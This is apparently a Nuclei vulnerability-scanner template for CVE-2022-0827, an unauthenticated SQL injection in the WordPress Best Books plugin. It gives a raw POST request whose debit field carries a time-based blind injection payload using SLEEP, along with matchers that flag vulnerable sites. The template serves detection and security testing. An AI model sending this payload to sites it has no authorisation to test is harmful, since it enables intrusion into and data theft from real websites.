nuclei-templates/http/cves/2022/CVE-2022-0827.yaml

48 lines
1.9 KiB
YAML

id: CVE-2022-0827
info:
name: WordPress Best Books <=2.6.3 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Best Books plugin through 2.6.3 is susceptible to SQL injection. The plugin does not sanitize and escape some parameters before using them in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
remediation: |
Update to WordPress Best Books plugin version 2.6.3 or later to fix the SQL injection vulnerability.
reference:
- https://wpscan.com/vulnerability/0d208ebc-7805-457b-aa5f-ffd5adb2f3be
- https://wordpress.org/plugins/bestbooks/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0827
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0827
cwe-id: CWE-89
epss-score: 0.02077
epss-percentile: 0.87827
cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: presspage
product: bestbooks
framework: wordpress
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated
http:
- raw:
- |
@timeout 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'status_code == 200'
- 'contains(body, "Account added successfully")'
condition: and
# digest: 4a0a00473045022100b404d1abbb9993f46b298f145297ec8f97f1f531bf63570f223c3332ca895c83022012d7c575b0096e46afdf6635388d978bab9770f2fc933fe27e23480989363670:922c64590222798bb761d5b6d8e72950